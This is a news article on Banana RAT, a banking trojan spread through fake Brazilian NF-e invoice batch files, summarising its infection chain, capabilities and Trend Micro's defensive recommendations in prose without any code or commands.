A new cyber threat, Banana RAT, is targeting Brazilian financial institutions by masquerading as legitimate electronic invoices. This malware, which disguises itself as NF-e (Nota Fiscal Eletronica) documents, exploits victims’ trust by embedding malicious batch files that install a remote access tool on Windows systems. The campaign is a sophisticated operation aimed primarily at Brazil’s financial sector.
Exploiting Brazil’s Trust in NF-e Invoices
NF-e is Brazil’s official electronic invoicing system, widely recognized and trusted by businesses nationwide. Cybercriminals leverage this trust by distributing files named “Consultar_NF-e.bat” through WhatsApp or phishing links, creating the illusion of routine tax documentation. In reality, these actions give attackers persistent access to victims’ computers.
Trend Micro’s Managed Detection and Response (MDR) team uncovered the malware during an investigation into Brazilian banking threats. Their findings revealed both server-side tools and client-side malware, providing a comprehensive understanding of the attack.
Detailed Examination of the Attack Mechanism
Trend Micro identified the threat cluster as “SHADOW-WATER-063.” The campaign significantly impacts 16 major Brazilian banks and several regional cryptocurrency exchanges. By targeting Brazil’s financial institutions, the attackers minimize the risk of infecting unintended targets.
The operation possibly follows a Malware-as-a-Service (MaaS) model, with its server-side code written in Brazilian Portuguese. The attackers have named this project “Projeto Banana,” indicating ongoing development and maintenance.
Technical Insights into Banana RAT Operations
The attack initiates when victims execute the malicious batch file, triggering a hidden PowerShell command. This command retrieves an encrypted payload, “msedge.txt,” from an attacker-controlled server. The payload is decrypted in memory, avoiding detection by conventional security measures.
Once active, the malware sets up a concealed scheduled task to maintain persistence. It camouflages itself within Microsoft diagnostic directories, making detection challenging. The malware also generates unique payloads for each victim, rendering traditional file-hash detection methods ineffective.
Robust Capabilities of Banana RAT
Banana RAT acts as a comprehensive platform for remote fraud and surveillance. It can stream victims’ screens, log keystrokes, simulate legitimate banking interfaces, and manipulate Pix QR codes during transactions. The malware communicates with its control server using a custom encrypted protocol, further complicating detection.
Security experts recommend blocking known network indicators, enabling real-time behavioral monitoring, and educating users about suspicious activities, especially during banking sessions.
The threat posed by Banana RAT underscores the importance of robust cybersecurity measures in protecting financial institutions. As this campaign evolves, continuous vigilance and proactive defense strategies are crucial to safeguarding sensitive financial data.
